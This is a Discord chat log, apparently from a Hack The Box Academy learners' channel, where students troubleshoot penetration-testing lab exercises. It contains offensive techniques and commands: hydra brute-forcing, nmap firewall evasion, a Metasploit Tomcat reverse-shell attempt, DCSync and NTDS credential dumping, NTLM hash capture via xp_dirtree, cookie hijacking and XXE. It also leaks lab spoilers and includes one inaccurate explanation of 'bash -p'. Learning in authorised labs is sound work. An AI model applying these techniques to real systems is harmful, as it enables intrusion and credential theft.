#modules

please restart your VPN

Switching VPN and trying to spawn a target doesn't work either

this would go in #1234357888114364508

same, I'm currently on Linux Fundamentals, can't spawn the target

I see, ima move that there ig

im on footprinting but it doesn't seem to give me anymore available subdomains

I think its fixed now

even with a large wordlist, not sure what i'm doing wrong

Just spawned a target guys

I'll try!

hey guys, how to get permission to talk in general?

still no luck for me 😦

same

still no targets

try one of SecLists dns wordlists, moreso the subdomains-top1million-x series

I reloaded the page before spawning.

that did it, cheers

it's fixed for me

Read and follow the instructions in #welcome

is there someone who can help me read through the report in the documenting and reporting section its difficult to know where to start and what to take screenshots and notes on. its all over the place. i was able to get into the dc01 host but i failed to document as i went. but everything was still up so i could capture it

Module: Windows Privilege Escation
Section: SeImpersonate and SeAssignPrimaryToken htb

impacket-mssqlclient slq_dev:'Str0ng_P@ssw0rd!'@$TARGET -windows-auth
Result: Encryption required, switching to TLS ==> breaks

Does anyone know what I am doing wrong. I am following the steps of the session

The module uses a different branch from impacket. It is recommended as per the documentation to use pipx.

You can install it using the following commands:

sudo apt update
sudo apt install pipx
pipx ensurepath
sudo pipx ensurepath --global # optional to allow pipx actions with --global argument

Then clone the official git repo of impacket to get it's unreleased changes from https://github.com/fortra/impacket/tree/master

Installing them by going into the directory where impacket is installed and running python3 -m pipx install .

Now you should be able to use mssqlclient.py and try logging in again

does it? it works for me even with the apt install but on pwnbox there's already a mssqlclient.py and that works

ah well i just tried it on my own machine and noticed the module was using the dev branch, it might already work with just the impacket-mssqlclient imma check 😄

oh yeah even with v0.11.0 it works

I think it's just impacket on pwnbox being weird, reinstalling with pipx is the right way to do things tho

hmm the impacket version on my pwnbox was v0.10.0 and running the command from the module also worked, so maybe pwnbox is weird on a per instance base, but indeed going the pipx way is much more less of a pain

can someone please help me on the "The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt" question in the type filters section of the file uploads module? am a trying everything but i just cant get rce? i am very confuesed and there dont seem to be any totorials on it besided this medium artical which i still cant follow.

which module and section is this ?

file uploads, type filters

Hello

I'm on the skills assessment for the Active Directory Enumeration & Attacks module. I was just wondering but when is a domain considered "compromised"? Is it when I gain local Administrator access on the DC? Is it when I have the credentials to a user belonging to the Domain Admins group?

the hint is very useful, you don't need any tutorials, just the stuff in the module

in both situations it can be considered compromised, but in the domain context it's usually when you have control over the whole domain

So having control over the whole domain could be having local admin access of the DC, access to a user who is in the Domain Admins group or Enterprise Admins group. Basically something that gives me complete control over the DC?

So I don't need to necessarily have the password for the user either, even a pass-the-hash to gain admin access would suffice as domain compromise?

ok

compromising the DC vs compromising the domain is slightly different, to compromise the domain you should have domain level access, but once you have locan admin on DC getting DA is pretty straight forward

You could interpret a domain compromise even if you have a foothold in the domain, like access to a low-privilege user. However Pentests can be internal which will often provide you with a set of user credentials. In that context I would only consider a domain fully compromised if you are able to get DA

as long as you have access, it could be even be a ticket or a certificate

DA? Domain Admin?

yes

Ahh, alrighty. So administrator access on DC = complete domain compromise. Thanks!

you should get DA as previously mentioned

^

Ohhh alrighty. Thanks. Wait, so what groups would the compromised user need to be part of to be considered having domain level access? Domain Admins and Enterprise Admins? Or any custom Administrator groups with domain level access?

any user/users that have privledged access over the domain

well it doesn't even have to be a user, as long as you have privileged access

What's the permission I have to check for privileged access?

anything that gives you admin

Okay ,thanks.

thc u for saying this, have rce now

Btw you mentioned getting DA is pretty straightforward if you have local admin on DC. How do you mean?

a local admin has DCSync privileges

so you can perform a DCSync attack with a local admin on a DC

Ouhhh okay. Thanks!

nah a local admin can't dcsync (talking about local accounts or SYSTEM here), but you can use the rights to save ntds which contains all domain creds or dump the registries to get the DC machine hash and dcsync with that @normal sand

ah right it needs to be part of the Administrator group on the dc my bad

Module : Linux Fundamentals Section : Filter Contents

Hello, I'm currently done reading the whole section about "less/more , head/tail, sort, grep, cut, column, and more" commands.

Now I am at questions, and it is asking me to "Determine what user the ProFTPd server is running under. Submit the username as the answer." and "Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com/" website and filter all unique paths of that domain. Submit the number of these paths as the answer."

I have a feeling those questions are not related to the module I'm currently working on, is there an error or I should be able to solve those task with just what I learnt so far?

I'm srsly confused at "obtain the source code of the "site""

Module information gathering, i cannot seem to do this.

section fingerprinting

IP address and vhosts added in the /etc/hosts

hang on

^^ fixed my issue, vhost wasn't correct in the /etc/hosts file added ".htb" at the end instead of ".local"

you can do it with the stuff in the module, use curl -s https://www.inlanefreight.com/ to get the source code for further processing

moduel:Login Brute Forcing/Service Authentication Brute Forcing/ssh service brute force, i have used the rockyou-10.txt, but nothing, and the full rockyou.txt is too long and server is only up for an hour. any hint?

i must be missing something,i also tried the other rockyou-20.txt and up

make a custom wordlist like the previous section

do you think there's also password policies applied?

alright, i didnt think i'll be using info from other sections

thanks alot, i will give it a try

Information Gathering (web edition)
Skill Assestment

Can't find the hidden hash of the admin api

Also in Information gathering I got issues installing Scrappy

if it's a 301 you should follow it

got it let me check

#modules message

Thanks, this worked even tho I haven't met the cUrl command explaination yet.

I had to check online and apparently 1 year ago section "Working with Web Services" was before the section "Filter Contents", somehow sections are not ordered or when re-ordered somebody forgot to check the questions

stuck in this question : Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.

should I use -l flag because It shows the same

ty

cant run oday.py

odat.py *

you can just use the browser, also remove the screenshot, spoilers

My table of content :

1. Introduction
2. The Shell
3. Workflow (where I am)
4. System Management

The table of content 1 year ago :
My table of content :

1. Introduction
2. The Shell
3. System Management
4. Workflow

thanks Anyways, I gotta do a bit of skipping and going back but I can proceed

Noted. Thanks.

Hey guys!, I found an issue with one of the sections in the OSINT: Corporate Recon module, how/who do I report it?

Okay... I can't access the directory through the browser

unable to connect

did you add it to your vhosts? and try add a / at the end

yep, is only where the hash is I cant access, I can connect to the robots.txt and else

Hello

should I restart pwnbox or target?

sometimes I can curl it but I can't see it from browser btw

just checked it works for me

if you do curl can you see the redirection?

ill try to reset

Hello

nah same I can still go to robots and evereything but the admin directory dont

works for me

did you enter the port number

yep

can I send ss dm?

you can send it here and delete after

got it

use the browser

also you can add -i to show where the redirect goes

btw now it shoes this

https?

no way

btw when I was in the robots file I only changed the directory to the admin one

got it? remember to delete the screenshots

and it removes the port and add https to the url I think it was that

yeah tysm

been trying for 2 hours im dying

someone pls send help for windows priv escalation SeDebugPrivilege

please some one can help me with question 58 ATTACKING ENTERPRISE NETWORKS (Web Enumeration & Exploitation)?

literally tried everything but keep error

question 5

please some one can help me with question 5 ATTACKING ENTERPRISE NETWORKS (Web Enumeration & Exploitation)?

Hey guys, im currently in the Nmap module, doing the last lab (Hard Lab 3) and i'm currently stuck (spoiler alert to those who still dont get here):
||Im stuck in finding the port of the service i got to scan, to the moment i've tried using decoys, setting the initial-rtt-timeout to 10000ms, setting --max-retries to 10 (Last 2 to avoid missing any incoming packet) and tried running a UDP scan just in case the service was in UDP and not TCP, i also tried running ACK scans with even less results. Some ports are still shown as filtered but are way too many like to be possibly be something (tends to be around 20%) of each scan. The question of the lab is Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer. and the hint is Our client also mentioned that they were forced to add a service that plays a vital role for their customer because they require large amounts of data.. I Don't know what else to do here, if possible, could anyone give me a hint on which direction to go?||

Did you use port 53 for evasion?

that worked for me

i did aswell, altho it worth giving it another shot

ok tell me if you got it

tcp scan gave me nothing to the moment with -g 53

send me your command in private

doing udp scan rn

aight

also disable arp ping and host discovery

did it

you are doing all ports scan, right?

try with 1 max retry just to prove

doing -F since theres a IPS installed on target

but gonna do -p- rn

which scan type should i do, Stealth SYN or UDP?

very specific hint:

||you're trying to find a tcp service||

saves me a lot of time, thx

What have you tried so far?

gonna try once again

not a problem

||also you need to connect to the service when you found it (If you already found it)||

did you run the shell as admin

yea, i got it :D

been doing this for a couple hours last night, couldnt find the port i had to attack

thx a lot dude

nw

althought something i actually cant get my head around is, why would setting the tcp source port to 53 avoid IPS detection and by doing so, avoiding dropping the connection?

port 53 is commonly used by dns servers

when i did the module I asked the same lol

this

yea, i know that, but what would be the point of just allowing the source port to be 53

"Im gonna let DNS servers to connect to my secret FTP service cus why not"

this is an inbound rule, the target could be sending requests to a dns server and it's replying from port 53

Ohhh, alright alright

and by doing so, it would allow any incoming connection as long as its source port is 53?

that's how it's configured in the lab

yea, i know this is scenario-specific configuration, but i just figure out then what was the 'mistake' in the machine that allowed enumeration in that port with nmap

then a good fix for this would be to allow any connection with source port 53 as long as its not connecting to a port with a service open, right?

I wouldn't call it a mistake, just abusing common rules

alright

ip whitelisting would be a common approach

but it's just how this lab is set up

did you get the flag?

did it :D

awsome

I know that, i remembered that guy from few days ago that did this same lab and questioned the same thing, but i think he didnt know how to ask his question and neither how to understand other people's answers

When I did the module the hardest for me was connecting to grab the flag but you've already do it haha

althoug it was only nc

netcat with the correct parameters, funny that we both stressed out with different parts on the lab

for sure

well, gonna take a break, thx again yall :D

Hey everyone, where could I get help for the skill assessment for the module Linux Privilege Escalation ?

#modules

oh wait nvm this is modules xd

lol

Well simply put, I'm doing the skill assessment and currently trying to get the flag 4. This flag can be read only by the tomcat user. So far I managed to find the credentials for the Tomcat Web Application Manager. Checking on both the manager and mfs, I found out I can upload a war file to then get reverse shell. I'm trying to use mfs with the exploit multi/http/tomcat_mgr_upload but I keep getting an error.
Here's the what I get :

[*] Started reverse TCP handler on 10.10.15.96:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 5wVDX...
[*] Executing 5wVDX...
[-] Exploit aborted due to failure: unknown: Failed to execute the payload
[*] Exploit completed, but no session was created```

yap fest

https://tenor.com/view/cat-cats-explosion-explodes-cat-explodes-gif-10131775219258044191

<@&861185840277487616>

you can try to do it manually

you can try creating a payload with msfvenom and upload it to tomcat

Oh yeah thanks, I found an article on HackTricks

how ?

the question states to enumerate the accessible services, the path goes over how to enumerate this and try to probe at those services looking for a flag, else you'll need to go over the modules again

that is the question
Steal an admin's session cookie and gain access to the support ticketing queue. Submit the flag value for the "John" user as your answer.

@hidden hemlock wym how?

oh nvm i misread the section

i try to use the cookie but i can't, if u have command please help me

Did you get the cookie?

review the section material, it explains how you can use the retrieved cookie

it even recommends a certain tool / plugin

If you already have the session cookie, you can use dev tools or cookie editor extension to use insert it into the browser

yes i do all but is not work i have error message for firefox when i add cookie

Can you send a screenshot of it?

5 mns please

Where are you adding the cookie to?

You'll need to link your app.hackthebox.com account to share screenshots

First-Party Isolation is enabled, but the required 'firstPartyDomain' attribute was not set.

that is the message i have

Well in that case, you need to navigate to the browser dev tools --> network ---> storage and add the cookie by using the name and value accordingly

Disable FPI in your browser

ok i try

Do you know how to do it?

1. Type about:config in the address bar and hit enter

2. Search for "privacy.firstparty.isolate"

3. Double click the preference to set It to false.

ok thank i do

thank is work now

Hi, thks for the help. I tried as u suggested (in the pwnbox) it i get the same error.

You can just do pipx install impacket

What did u actually do to make it work? i couldnt get it to work neither in my machine nor in the pwnbox

No need to clone the repo

Result: "impaclet already seems to be installed

Then pipx upgrade impacket iirc

Or it's update

the default impacket install works, I tested it on the module with pwnbox

mssqlclient.py

Im using right now the pwnbox.
The default mssqclient.py gives me the same error

Did you specify --local-auth

yes

Diablo pushed an update

ill restart the pwnbox and try again. Maybe it got mixed with cloning the repo, reinstalling all that thing

Did you try without?

i am following the description in the module, it means always using -windows-auth

fresh pwnbox and target

should I have the same result my local machine (not pwnbox)?

you should have the same result anywhere

if you're having problems on your own machine upgrade impacket

ok ill do that. I have the impression that i have a lot of "impackts" now im my machine

you can remove the apt version, all you need is the pipx install if you just want to use it in the terminal

just with apt purge impacket* and keep the rest?

is there a preferred connection limit when using hydra?

sudo apt remove impacket-scripts

then set it up using pipx with this

Depends on the service

smtp

Don't need too many, it's a slow service to respond

i ask bc im getting this error

What's your command and what section are you doing?

I don't recall using hydra to attack smtp

attacking common services/attacking email services

Thks all for the support.

I don't recommend rockyou

Also the service used to bruteforce is pop3 not smtp

Or imap

As those services have authentication protocols

Rockyou should work I just checked

yeah I should have known that 😅 looking at the module material & the solution there is a discrepancy

Learn to use your brain

Instead of just copy/paste

As harsh as it sounds. If you're just hitting the question then immediately jumping to the guide, you're setting yourself up for failure

^ The way modules are designed in most cases is that they teach you to understand

I suggest the walkthroughs as a red-button last resort

After checking everything else

I have a problem in Pivoting, Tunneling and Port Forwarding module in ICMP Tunneling task.

I can ping the pivot host, the nmap successfully finds 22 port, I can see a SSH banner when I connect with netcat but performing ssh login times out every time and results in error connection closed by <pivot ip> port 22. I have reset the target multiple times. Do I not understand something and should try a different approach or the host is simply not working properly?

The task states that I should ssh to the pivot host

Did you solve It?

heya. i recently decided to start learning bug bounty again. currently doing the using web proxies module, and running into an issue in the automatic modification chapter, specifically when using ZAP's replacer. I try to replace the User-Agent string with User-Agent: HTBAgent 1.0 as instructed by the module (well, a similar string)

my match type is set to Request Header (will add if not present)
Match string is set to User-Agent
Replacement string is set to User-Agent: HTBAgent 1.0
Match Regex is enabled
The replacer thing is enabled
in the initiators tab only Apply to all HTTP(S) messages is enabled

Anyone know if any of this is wrong? when i enable breaker and look at what the user agent is in my requests it is still the standard thing. what did i mess up in my settings?

Nevermind i'm just dumb

The URL field is empty in the replacer window ^^

Hi! I'm in Password Attcks - Password Reuse / Default Passwords
I've already solved the lab and... I dont know why the instruction is "Use the user's credentials we found in the previous section and find out the credentials for MySQL", I mean, it wasn't necessary to use those credentials, but the default cheat sheet or am I missing something? I was looking through the ssh session of the user sam but I found nothing

When I found the answer I was like.. wtf why?

easiest module ever but wayback not working, https://academy.hackthebox.com/module/144/section/1256

Q1 How many Pen Testing Labs did HackTheBox have on the 8th August 2018? Answer with an integer, eg 1234.

https://web.archive.org/web/20180801000000*/https://www.hackthebox.com/

clicking on august 8 2018 i just get a godaddy site

i agree & normally do, thanks for the reminder

can someone check out what im clicking wrong on the webarch site

I am on Password Attacks > Credential Hunting in Linux in the Academy
The hint states "From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". "
But this doesnt work to get me on the system. Do I need to do a mutation list of that password?

guys i’m currently looking at smbclient in a module im doing, im trying to install smbclient on my ParrotOS VM but keep getting errored

i’m doing sudo apt install smbclient

error i’m getting is unmet dependencies, with samba-common and samba-libs

https://superuser.com/questions/1793779/parrot-os-unmet-dependencies-held-broken-packages

appreciate it

because you're meant to use his credentials to get a foothold of sorts :)

add -t lory-backports

oh yeah makes sense i was just giving the commands that were showcased on the repo but you're right

Nothing, I just spawned a pwnbox instance and it worked right out the gate

<@&861185840277487616> Ban @rustic sage

hi for the linux file transfers section of file transfers module, I am trying to transfer the file but its saying permission denied. Here's my terminal after I SSH into target server and start http server in pwnbox. This is the terminal for target only, not pwnbox:

htb-student@nix04:/home/mrb3n$ wget http://10.10.15.19:8000/upload_nix.txt
--2024-07-11 20:19:50--  http://10.10.15.19:8000/upload_nix.txt
Connecting to 10.10.15.19:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32 [text/plain]
upload_nix.txt: Permission denied

Cannot write to ‘upload_nix.txt’ (Permission denied).

if you need pwnbox terminal its just I have http server running

what's the error message in your pwnbox?

oh

wait

even simpler issue

you're not mrb3n so you can't write to his home

look at where you are

cannot write to == local == you can't write to the file location/cwd you're in

ya but in htb-student location won't let me write either

htb-student@nix04:~$ sudo wget 10.10.15.19:8000/upload_nix.txt
[sudo] password for htb-student: 
Sorry, try again.
[sudo] password for htb-student: 
htb-student is not in the sudoers file.  This incident will be reported.

why are you trying to do sudo?

without sudo it worked

amazing that

solved challenge

the original reason for permission denied is because you were trying to write to another user's home directory

Ok. Why didn't it work with sudo?

because in this instance, htb-student doesn't have sudo permissions

yes that explains error message silly me

as stated htb-student is not in the sudoers file.

ya ok. then in this case sudo not required so I'm good

yep, you can check what you can run with sudo by typing “sudo -l”

In this case it’s nothing

https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-i-hate-your-deck-reading-the-card-gif-22381436

there are only a handful of times where the error is complicated and doesn't explain the issue

ok got it

https://tenor.com/view/thumbs-up-baby-gif-5867472052584812355

Oh no my GIF didn’t work 😂

gotta link your htb account see #welcome

Alright, thanks

Incorrect, I talked to Support. It was like I thought a mutated password list of LoveYou1.

I found it after creating a mutated list

||L0vey0u1!||

oh you're referring to the password attacks module

in which case; yes the mutated wordlist

but it depends on which section

yes, just the initial access with Kira

the will section yes does require kira

yeah, now onto finding will's stuff

btw for this module: always check C:/Users and /home/ for a shortened userlist

the Windows labs and Linux labs are directly connected to the other respective OS labs

so all Windows labs are connected and all Linux labs are connected in this module

(except the skill assessment)

but kira password does exist in the large mutated password list

and that didnt take long to finish that section after I got on, lol

.

I turned off real time check for windows defender ( it shows a text alert in the windows security home page). i've tried resetting the target, but it happened twice already. it does say it wants to update, and searching up the error code it is related to updating. i don't think there would be an issue with that though

Pivoting, Tunneling, and Port Forwarding - Double Pivots - RDP and SOCKS Tunneling with SocksOverRDP

Hello. Looking for hint on password attacks easy lab. Found a couple of services and trying to bruteforce using password lists and hydra. I've tried the module resources, mutations and couple other lists. Am I on the right track?

Keep it simple. Use the regular wordlist first before mutated

Also most services can handle 48 threads

The regular wordlist provided in the module resources?

Yes

Ok I thought I had tried that I'll double back and make sure I'm not getting confused. Thx 4 the hint

I forgot that there was also a username list in the resources.... gonna give it a try with that

This should take half hour or so at least right?

don't forget to add -f to force it to quit after only finding one set of creds

also -u to have it cycle through the username list first instead of trying every password against a user then switching to the next user

also threads

For Web Requests page 6, I tried doing it in curl on my local pc, and it didn't work unlike the previous ones? My workstation instance ended so I'm trying to figure out if I need to wait a while again or if I'm missing something myself.

I just got this 🤔

I mean you're getting 200 ok?

I don't think "test" is a valid city for you to get any results back

what does -p in this command do?
bash -p

man bash

privileged shell

No

I did, but didn't understand

My bad, apparently I can't grok man either

Lol

TLDR it clears a number of variables - it doesn't grant privileges, but rather provides a "clean slate", with some behaviors disabled. TIL

Oh ok

The bash binary has no SUID flag, so would never escalate to another user, unless it's been modified. To escalate, you'd need to sudo bash, or sudo su.

The -p flag in the bash command stands for "privileged mode". When you run bash -p, it starts a new Bash shell in privileged mode. This mode makes the shell act as if it had been invoked by the superuser, even if it hasn't been. Here are some key aspects of what this mode does:

Disables Processing of the $ENV File: Normally, Bash processes the $ENV environment variable when it starts in non-interactive mode. In privileged mode, this processing is disabled to prevent potential security risks.

Disables Import of Shell Functions: When in privileged mode, Bash does not import shell functions from the environment. This helps prevent untrusted functions from altering the behavior of the shell.

Disables BASH_ENV Variable Processing: The BASH_ENV environment variable, which can specify an initialization file to be executed when the shell starts, is ignored in privileged mode.

Disables History File Expansion: History file expansion is turned off to prevent inadvertent or malicious command execution from the shell history.

The primary purpose of this flag is to enhance security, especially when a shell is being started in an environment where security is a concern.

Every day is a school day 😆

Oh okay

💯

thank you

damn still not able to sleep? same 😄

Yeah, done a load of house work, gonna go back to bed shortly for attempt number two

hope you'll be dreaming of vileda products 😛

lol

I'm not that civilized

I hate the password attack module. I’m almost done with it, but now I need to go back and find Kira’s password again to even start the much later lab.

Always write down all the creds you find somewhere!

if you're doing the CPTS path; (and likely others) this won't be the first or last time that you'll need to reuse creds you found previously in a module

Yes I’m working the path. Would really like to get this module behind me.

hmm I didn't think it mattered

Looks the same as far as I can tell

actually content-length is 12 instead of 0

I don't see any content though?

https://academy.hackthebox.com/module/144/section/3079
Trying to install scrapy. Up until this line, everything seemed to be going alright. $python3 ReconSpider.py http://inlanefreight.com

This is the output when running this command:

I see an output

https://discord.com/channels/473760315293696010/1257062567965364334

stuck on this, any clue?

Just to be clear you just downloaded the ReconSpider.py file yeah?

Read through the pages linked in the module. Then you should be able to answer the question without any problems

What is the API key in the hidden admin directory that you have discovered on the target system? (if you need help DM. very hard for me and took like 2 hrs)

yeah i think i did

i did '$pip3 install scrapy' but had to change it i dont remember what to though

also i am trying to do what was stated in the conversation, and dont really understand

like are the modules in my files

or is it something external

@rustic sagewhich q are you on

im not on a question. Im just trying to install the tool

A

try this #modules message

Yes

how good is the OSINT module and which main platform boxes are for practicing OSINT?

I think OSINT is something I plan to study at some point in the future

I’m thinking its a complement to pentesting

Has anyone completed the API attacks module? Currently stuck on the Broken Authentication part. I think the solution involves brute forcing the otp api endpoint but ffuf isnt returning a password. I might be attacking the wrong endpoint, not sure

Search for "Lo"

Nvm you have an output lmao

You can see content length is more than 0

It was alright. But in my pov well expensive

just tested and it works, dumps lsass just fine

There's literally an output named "Boston (US)"

lol that's what i said earlier

😂

.

You’re both right

https://tenor.com/view/your-prize-ごほうび-賞品-お疲れさま-キャンディー-gif-15782516

If they give me a VIP htb voucher, how much time do I have to claim before it expires?

got it thanks
the skill assessment was really fun

What

<@&861185840277487616>

bot?

Hi,

Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Bleeding Edge Vulnerabilities

I am doing the steps shown for "PetitPotam". So far, I have managed to get the base64 encoded certificate for DC in the ntlmrelayx window by executing petitpotam.py. Now, I am trying to get the TGT from this certificate using gettgtpkinit.py. The base64 certificate that I get is very long and its starting is same as the one shown on the section. But the end of the certificate is different than the one shown in the section. And when I execute the command python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache, I get the following error:

Since the base64 certificate is very long, I tried storing its content on a file and then use -cert-pfx file instead of -pfx-base64 {base64_string} and it also gives me following error:

Make sure you're copying the whole string, the error suggests there's an issue with it.

I am copying the whole string

Hi

Im having issues connecting to an IP address from Information gathering module, I've already tried reset the machine, but kinda seconds later of started, I have no connection anymore with the addres in question

Is the correct VPN connected?

It looks like you're not connected to the vpn

Im pretty sure im using vpn

As it's using your 192.168.x.x internal ip

double, triple check

Not the 10.10.x.x assigned by htb

ip a

Oh wait info gathering most don't require vpn

You're generally not gonna ping them as they're containers

http://ip:port in the browser

Looking closely, I do have ping, but when the fuzz subsubdomain scan starts the connection just breaks

That's your router being funky

Use bridged networking for your vm

Thats what Im afraid to....

not vm, native linux

Oh

Then yeah it's your router throttling it

thx im on it

Basically some protection on your router is thinking that there's something malicious going on

Can it be disabled?

Depends on ISP

some let you mess with the router more than others ¯_(ツ)_/¯

Imo you shouldn't be doing pentesting (even learning) on baremetal

To be extra sure it's a you issue, try with the pwnbox

Routers run Linux mostly so if you could get an exploit working and get root on the router you could mess around

Which depending on ISP is a nono

Most ISP (in US) only lend you the router, meaning they still own it

As it's a router/modem combo

Same here yeah

Most allow a level of administrative access on the router

The only admin access you get is the ability to manage the network/passwords and stuff

Is -my router- issue

pwnbox works good

I am talking actual root shell on the router

Again I don't advise that unless you know the ToS/warranty

I'm not doing it

Yes and I suggest not advising others to do it

Because if you brick it ISP can basically tell you you're SOL

Hey, i'm stuck on 3rd Question of "Password Attacks" module Section "Network Attacks" which states "Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there". Already tried all possible techniques I remember, no results. Can someone help please, thanks in advance!

Im not sure if I remember correctly, but I think you can just brute force it using hydra with the provided lists in Resources

I attempted brute-forcing using Hydra, but it's yielding numerous false positives. I also used crackmapexec, but it didn't yield any results. I generated a custom user wordlist using 'net users' commands via Evil Winrm and tried brute-forcing with it, yet still no success. Additionally, I created a custom password wordlist using John, based on the provided rules.list from the resources, but it generated over 100,000 passwords, which will take days to process.

Hello 👋

i dont think you need to mutate the lists yet for this question.

i ll check if i have some notes somewhere for this

Sure, any hint would be helpful

Good morning locos. I am on the Web Attack module at the XXE exercise Advance File Inclusion. I have made all the steps required and i get a behaviour that is normal. But while my script gets downloaded as we see in the second picture when ithe response in Burp does not show what is intended. The text inside the script is <!ENTITY joined "%begin;%file;%end;"> . Do you know why this behaviour does not bring the requested file in the BURP answer?

ok i ddint have notes, but i spinned up the machine again and was able to get creds using brute force

are you sure you tried the lists provided in Resources in the lesson?

Yeah I tried it alot of times. Its giving me multiple results. But can't login with any of them. Used xfreerdp and Remmina too!

i ll try to log in to make sure it works

I'm an Hacking professional

Feel free to contact me regarding help

Yeah sure

well it works for me, using: hydra -L username.list -P password.list rdp://10.129.202.136 -t 32 i got a valid login and could RDP to target with xfreerdp

Let me try again. I didn't use the threads option other than that its all same

No results man. Don't know what causing this, either its a VPN issue or what.
Btw is the username: john, pass: november?

thats weird.. nope, user starts with c and psw 7

Got it

So its chr** and 789******

yea

Lol and still I can't rdp with it.

what error you get?

Thats the issue, because of which i wasted around 7-8 hours now

i have problems with rdp too sometimes, xfreerdp just refusing to connect, but usually it was ok after resetting the box

[05:20:41:797] [1254475:1254476] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[05:20:41:797] [1254475:1254476] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[05:20:44:018] [1254475:1254476] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[05:20:44:018] [1254475:1254476] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[05:20:44:018] [1254475:1254476] [ERROR][com.freerdp.core] - freerdp_post_connect failed

Already tried. Remmina also not working

:\

Anyways. Thankyou so much for your help bro. It was so kind of you!

no worries. check your dms

I'm on attacking common services SQL db's, if i access the server without -windows-auth i can use commands, but i can't access flagDB, and if i use the windows auth flag, it just closes and I can't do anything. Any guidance?

hello , can someone help me with Web Enumeration under start with hackthe box

im trying to find this file /usr/share/dirb/wordlists/common.txt

but its not there , i dont find the right txt file

locate common.txt

try that one

ok thanks

it found nothing

Indeed the correct command is without -windows-auth, and it's normal that you can't enumerate flagDB, you don't have the rights. ||You need an other user||

i did
gobuster dir -u http://94.237.59.63:57275/ -w /usr/share/wfuzz/wordlist/general/common.txt

whats the error

how am i meant to find the other user? I tried accessing the pop3 and imap services

and i cant enumerate anything else

no error , it finish but with no result , because i coudnt find the file i used a guide on the internet and he do get results

You need to use a technique taught in the same chapter

if you mean capturing the hash, that isn't working either, because i need a share to do that, and i cant find the shares

i think this is the one
gobuster dir -u http://94.237.59.63:57275/ -w /usr/share/seclists/Discovery/Web-Content/common.txt

You can catch the hash, I believe you just have to use the same commands with your tun0 IP.

The share doesn't need to exist, responder will catch any request with a NTLM hash made to a smb share on your tun0 IP

``EXEC master..xp_dirtree '\IP\share'`?

I didn't add share because idk the share

The share doesn't need to exist, responder will catch any request with a NTLM hash made to a smb share on your tun0 IP

I done all questions on the new API Attacks but this question. Any that could help?

@split glade even after adding the share, nothing has happened, this is so confusing to me

What responder command did you use?
Also, could it be a firewall problem?

And no it isn't a firewall problem

Maybe try with impacket-mssqlclient htbdbuser@$TARGET instead

I had troubles with sqsh on kali

am facing the similiar issue... i tried many ways but it still isnt working

Both instances nothing is captured @split glade

actually i think i might have figured it out

Quick Question is there a way to bookmark modules on the dashboard of your pathway to make it easier to remember which are priority to re-visit? if not is this something I can raise a feature request for?

no

and you can use /feedback

hey guys. Do you know maybe why i am getting this behaviour with the XXE vulnerability applied here?

Why aren't you targeting flag.php?

that is true

I haven't been able to connect to the target host for 2 days now. Trying to run a simple metasploit exploit, can't even nmap the target host is anyone else experiencing this issue?

that would have been my second step . I just though to make the vulnerability target the file that the excercise indicates in the explanation first

Sometime this happen. When this happen or i go to support and try to fix it this way or i go tot he terminal they provide and do the excercise from there. Most of the time when it doesn't work on my VM it woks on the pwnbox

I'll try that

It should work even if i dont target the flag.php file isn't it?

Module: Information Gathering - Web Edition
Section: Skill Assessment
Question: What is the API key in the hidden admin directory that you have discovered on the target system?
I used gobuster but I couldn't get any output, can anyone help?

DM

Did you complete the question before that?

yes

Then you just need to go through that results.json file again

module: Network Enumeration with Nmap - Question: how do you get the IP you are required, I used the one thast is mentioned/used above 10.129.2.18 but it doesn't bring any results, I know how to use nmap through CTFs. I have gonbe back through the material to find another IP but couldn't I guessed the OS but obviously, im curious about the process as when I rsan the nmap command it kept coming back with a 10.10.16.1 traceroute. thanks for any help

If i understood you correctly, you can trace the packets with nmap and with ttl value you can figure out the operating system.

Oh perfect thank you I will give that a try! It’s more so I know I completed it properly I have used nmap a lot before but don’t like to not fulfil the tasks properly

anitadik

ah god please

fk me

It worked when targeting the /flag.php. Why it can not work when trying got get /var/ww/html/submitDetails.php?

very strange. Could it be that for the submitDetails.php folder there is some type of protection for xxe which I dont see? but for /flag.php there is not?

hey, im doing the "Intro to C2 Operations with Sliver" module and am getting weird errors when running a bloodhound collector via bloodhound-python
my command:

proxychains bloodhound-python -u [redacted] -p [redacted] -ns 172.16.1.15 -d child.htb.local -c all --dns-tcp --dns-timeout 30`

error:

dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.gc._msdcs.child.htb.local.localdomain. IN SRV: Server Do53:172.16.1.15@53 answered SERVFAIL`

• running the collector locally with sharphound works perfectly well
• omitting --dns-tcp causes a lifetime resolution timeout, same with --dns-timeout
• 172.16.1.15 dc01.child.htb.local child.htb.local is added to my /etc/hosts
• specifying -dc dc01.child.htb.local does not resolve the error
• afaik, there is not a secondary domain controller (dc02.child.htb.local)

any help would be appreciated 😄

I assume you've added the hostname to your hosts file? looks like a dns issue, can you do a manual query with nslookup to the DC to see if it resolves

can you reach the host in the first place

hmm yeah looks like problems with the dns server there

maybe give this a try
https://github.com/NH-RED-TEAM/RustHound

voodoo magic

increase timeout with nslookup

oh there might not be an easy way with nslook up, maybe dig dig @8.8.8.8 example.com +timeout=10

i tripppled encoded the payload

and i still can't get it to work properly

it's joever

